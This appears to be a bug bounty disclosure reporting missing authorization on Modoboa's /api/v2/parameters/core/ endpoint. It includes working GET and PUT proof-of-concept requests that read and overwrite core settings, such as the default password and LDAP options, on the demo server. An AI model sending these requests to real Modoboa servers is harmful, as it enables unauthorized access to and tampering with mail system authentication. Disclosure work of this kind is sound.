Improper Authorization in modoboa/modoboa
Reported on
Feb 25th 2023
Description
During testing, it was observed that sending a GET request to the following endpoint: /api/v2/parameters/core/ returns sensitive information without any authentication or authorization.
Request
GET /api/v2/parameters/core/ HTTP/1.1
Host: demo.modoboa.org
User-Agent: 7h3h4ckv157
Accept: application/json, text/plain, */*
Accept-Language: en
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 0
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Sat, 25 Feb 2023 03:26:58 GMT
Content-Type: application/json
Content-Length: 1709
Connection: close
Vary: Accept, Accept-Language, Cookie
Allow: GET, PUT, HEAD, OPTIONS
X-Frame-Options: SAMEORIGIN
Content-Language: en
{"label":"General","params":{"authentication_type":"local","password_scheme":"sha512crypt","rounds_number":70000,"update_scheme":true,"default_password":"Pwned-by-7h3h4ckv157","random_password_length":8,"update_password_url":"","password_recovery_msg":"","sms_password_recovery":false,"sms_provider":null,"ldap_server_address":"localhost","ldap_server_port":389,"ldap_enable_secondary_server":false,"ldap_secondary_server_address":"localhost","ldap_secondary_server_port":389,"ldap_secured":"none","ldap_is_active_directory":false,"ldap_admin_groups":"","ldap_group_type":"posixgroup","ldap_groups_search_base":"","ldap_password_attribute":"userPassword","ldap_auth_method":"searchbind","ldap_bind_dn":"","ldap_bind_password":"","ldap_search_base":"","ldap_search_filter":"(mail=%(user)s)","ldap_user_dn_template":"","ldap_sync_bind_dn":"","ldap_sync_bind_password":"","ldap_enable_sync":false,"ldap_sync_delete_remote_account":false,"ldap_sync_account_dn_template":"","ldap_enable_import":false,"ldap_import_search_base":"","ldap_import_search_filter":"(cn=*)","ldap_import_username_attr":"cn","ldap_dovecot_sync":false,"ldap_dovecot_conf_file":"/etc/dovecot/dovecot-modoboa.conf","rss_feed_url":null,"hide_features_widget":false,"sender_address":"noreply@yourdomain.test","enable_api_communication":true,"check_new_versions":true,"send_new_versions_email":false,"new_versions_email_rcpt":"postmaster@yourdomain.test","send_statistics":true,"inactive_account_threshold":30,"top_notifications_check_interval":30,"log_maximum_age":365,"items_per_page":30,"default_top_redirection":"user","sms_ovh_endpoint":"ovh-eu","sms_ovh_application_key":null,"sms_ovh_application_secret":null,"sms_ovh_consumer_key":null}}
The response contained sensitive information which could be used by an attacker to gain unauthorized access to the system. This issue poses a significant risk to the confidentiality and integrity of the system and its users, because the information returns from the request can be modified using another PUT request.
Request
PUT /api/v2/parameters/core/ HTTP/1.1
Host: demo.modoboa.org
User-Agent: 7h3h4ckv157
Accept: application/json, text/plain, */*
Accept-Language: en
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 1680
Connection: close
{"authentication_type":"local","password_scheme":"sha512crypt","rounds_number":70000,"update_scheme":true,"default_password":"Pwned-by-7h3h4ckv157","random_password_length":8,"update_password_url":"","password_recovery_msg":"","sms_password_recovery":false,"sms_provider":null,"ldap_server_address":"localhost","ldap_server_port":389,"ldap_enable_secondary_server":false,"ldap_secondary_server_address":"localhost","ldap_secondary_server_port":389,"ldap_secured":"none","ldap_is_active_directory":false,"ldap_admin_groups":"","ldap_group_type":"posixgroup","ldap_groups_search_base":"","ldap_password_attribute":"userPassword","ldap_auth_method":"searchbind","ldap_bind_dn":"","ldap_bind_password":"","ldap_search_base":"","ldap_search_filter":"(mail=%(user)s)","ldap_user_dn_template":"","ldap_sync_bind_dn":"","ldap_sync_bind_password":"","ldap_enable_sync":false,"ldap_sync_delete_remote_account":false,"ldap_sync_account_dn_template":"","ldap_enable_import":false,"ldap_import_search_base":"","ldap_import_search_filter":"(cn=*)","ldap_import_username_attr":"cn","ldap_dovecot_sync":false,"ldap_dovecot_conf_file":"/etc/dovecot/dovecot-modoboa.conf","rss_feed_url":null,"hide_features_widget":false,"sender_address":"noreply@yourdomain.test","enable_api_communication":true,"check_new_versions":true,"send_new_versions_email":false,"new_versions_email_rcpt":"postmaster@yourdomain.test","send_statistics":true,"inactive_account_threshold":30,"top_notifications_check_interval":30,"log_maximum_age":365,"items_per_page":30,"default_top_redirection":"user","sms_ovh_endpoint":"ovh-eu","sms_ovh_application_key":null,"sms_ovh_application_secret":null,"sms_ovh_consumer_key":null}
Response
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Sat, 25 Feb 2023 03:24:46 GMT
Content-Length: 0
Connection: close
Vary: Accept, Accept-Language, Cookie
Allow: GET, PUT, HEAD, OPTIONS
X-Frame-Options: SAMEORIGIN
Content-Language: en
Proof of Concept
Impact
The impact of this vulnerability is severe, as it allows an attacker to gain sensitive information and modify it, posing a significant risk to the confidentiality and integrity of the system and its users' data. It is critical to address this vulnerability immediately to prevent any further exploitation by malicious actors.
References
@Maintainer @Admin
Is it possible to add here: https://github.com/modoboa/modoboa/security/advisories


